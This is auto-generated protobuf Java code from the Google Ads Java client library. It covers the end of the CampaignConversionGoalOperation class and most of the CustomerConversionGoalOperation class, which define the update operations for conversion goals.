* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CampaignConversionGoal, com.google.ads.googleads.v20.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v20.resources.CampaignConversionGoalOrBuilder> updateBuilder_; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> * @return The update. 
*/ @java.lang.Override public com.google.ads.googleads.v20.resources.CampaignConversionGoal getUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } else { if (operationCase_ == 1) { return updateBuilder_.getMessage(); } return com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ public Builder setUpdate(com.google.ads.googleads.v20.resources.CampaignConversionGoal value) { if (updateBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { updateBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ public Builder setUpdate( com.google.ads.googleads.v20.resources.CampaignConversionGoal.Builder builderForValue) { if (updateBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { updateBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ public Builder mergeUpdate(com.google.ads.googleads.v20.resources.CampaignConversionGoal value) { if (updateBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance()) { operation_ = com.google.ads.googleads.v20.resources.CampaignConversionGoal.newBuilder((com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { updateBuilder_.mergeFrom(value); } else { updateBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ public Builder clearUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } updateBuilder_.clear(); } return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ public com.google.ads.googleads.v20.resources.CampaignConversionGoal.Builder getUpdateBuilder() { return getUpdateFieldBuilder().getBuilder(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() { if ((operationCase_ == 1) && (updateBuilder_ != null)) { return updateBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CampaignConversionGoal, com.google.ads.googleads.v20.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v20.resources.CampaignConversionGoalOrBuilder> getUpdateFieldBuilder() { if (updateBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CampaignConversionGoal, com.google.ads.googleads.v20.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v20.resources.CampaignConversionGoalOrBuilder>( (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return updateBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // 
@@protoc_insertion_point(builder_scope:google.ads.googleads.v20.services.CampaignConversionGoalOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v20.services.CampaignConversionGoalOperation) private static final com.google.ads.googleads.v20.services.CampaignConversionGoalOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v20.services.CampaignConversionGoalOperation(); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CampaignConversionGoalOperation> PARSER = new com.google.protobuf.AbstractParser<CampaignConversionGoalOperation>() { @java.lang.Override public CampaignConversionGoalOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CampaignConversionGoalOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CampaignConversionGoalOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v20.services.CampaignConversionGoalOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,941
google-ads-stubs-v20/src/main/java/com/google/ads/googleads/v20/services/CustomerConversionGoalOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v20/services/customer_conversion_goal_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v20.services; /** * <pre> * A single operation (update) on a customer conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CustomerConversionGoalOperation} */ public final class CustomerConversionGoalOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v20.services.CustomerConversionGoalOperation) CustomerConversionGoalOperationOrBuilder { private static final long serialVersionUID = 0L; // Use CustomerConversionGoalOperation.newBuilder() to construct. private CustomerConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CustomerConversionGoalOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CustomerConversionGoalOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CustomerConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.class, com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.Builder.class); } private int bitField0_; private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; 
public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { UPDATE(1), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return UPDATE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? 
com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int UPDATE_FIELD_NUMBER = 1; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v20.resources.CustomerConversionGoal getUpdate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v20.services.CustomerConversionGoalOperation)) { return super.equals(obj); } com.google.ads.googleads.v20.services.CustomerConversionGoalOperation other = (com.google.ads.googleads.v20.services.CustomerConversionGoalOperation) obj; if (hasUpdateMask() != other.hasUpdateMask()) return 
false; if (hasUpdateMask()) { if (!getUpdateMask() .equals(other.getUpdateMask())) return false; } if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getUpdate() .equals(other.getUpdate())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } switch (operationCase_) { case 1: hash = (37 * hash) + UPDATE_FIELD_NUMBER; hash = (53 * hash) + getUpdate().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static 
com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream 
input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v20.services.CustomerConversionGoalOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (update) on a customer conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CustomerConversionGoalOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v20.services.CustomerConversionGoalOperation) com.google.ads.googleads.v20.services.CustomerConversionGoalOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CustomerConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.class, 
com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.Builder.class); } // Construct using com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } if (updateBuilder_ != null) { updateBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v20.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v20.services.CustomerConversionGoalOperation getDefaultInstanceForType() { return com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v20.services.CustomerConversionGoalOperation build() { com.google.ads.googleads.v20.services.CustomerConversionGoalOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v20.services.CustomerConversionGoalOperation buildPartial() { com.google.ads.googleads.v20.services.CustomerConversionGoalOperation result = new com.google.ads.googleads.v20.services.CustomerConversionGoalOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return 
result; } private void buildPartial0(com.google.ads.googleads.v20.services.CustomerConversionGoalOperation result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v20.services.CustomerConversionGoalOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && updateBuilder_ != null) { result.operation_ = updateBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v20.services.CustomerConversionGoalOperation) { return mergeFrom((com.google.ads.googleads.v20.services.CustomerConversionGoalOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v20.services.CustomerConversionGoalOperation other) { if (other == 
com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } switch (other.getOperationCase()) { case UPDATE: { mergeUpdate(other.getUpdate()); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getUpdateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { input.readMessage( getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * <pre> * FieldMask that determines which resource fields are 
modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask( com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CustomerConversionGoal, com.google.ads.googleads.v20.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v20.resources.CustomerConversionGoalOrBuilder> updateBuilder_; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> * @return The update. 
*/ @java.lang.Override public com.google.ads.googleads.v20.resources.CustomerConversionGoal getUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } else { if (operationCase_ == 1) { return updateBuilder_.getMessage(); } return com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ public Builder setUpdate(com.google.ads.googleads.v20.resources.CustomerConversionGoal value) { if (updateBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { updateBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ public Builder setUpdate( com.google.ads.googleads.v20.resources.CustomerConversionGoal.Builder builderForValue) { if (updateBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else 